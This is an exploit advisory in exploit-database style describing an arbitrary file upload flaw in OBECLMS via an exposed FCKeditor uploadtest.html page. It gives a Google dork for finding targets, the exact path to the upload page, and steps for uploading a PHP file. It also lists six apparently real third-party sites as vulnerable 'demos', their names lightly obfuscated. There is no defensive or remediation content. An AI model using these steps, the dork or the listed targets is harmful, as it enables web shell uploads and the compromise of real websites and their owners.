[+] OBECLMS (fckeditor) Arbitrary File Upload Vulnerability [+] Exploit Title : OBECLMS (FCKEDITOR) [+] Exploit Author : Ashiyane Digital Security Team [+] Vendor Homepage : http://www.obeclms.com [+] Google Dork : inurl:index.php?show_flash_subject [+] Date: 2015-04-14 [+] Tested On : Windows 7 / Mozilla Firefox [+] Version : All Version [+] exploit => core_main/editor/editor/filemanager/connectors/uploadtest.html [+] first go to => http://site.com/[path] [+] then => http://www.site.com/[path]/core_main/editor/editor/filemanager/connectors/uploadtest.html [+] select => Select the "File Uploader"> php ... upload to : Uploaded File URL: [+] demos : [+] http://sinnarin.Xsesao33.net/core_main/editor/editor/filemanager/connectors/uploadtest.html [+] http://watponXsap.com/obeclms/core_main/editor/editor/filemanager/connectors/uploadtest.html [+] http://krooyXim.com/core_main/editor/editor/filemanager/connectors/uploadtest.html [+] http://kateclassrXoom.com/core_main/editor/editor/filemanager/connectors/uploadtest.html [+] http://www.kloXngklau.net/core_main/editor/editor/filemanager/connectors/uploadtest.html [+] http://iepchinXorot.com/core_main/editor/editor/filemanager/connectors/uploadtest.html [+][+][+][+][+][+][+][+][+][+][+] [+]Discovered By : Cyb3r_Dr4in[+] [+][+][+][+][+][+][+][+][+][+][+]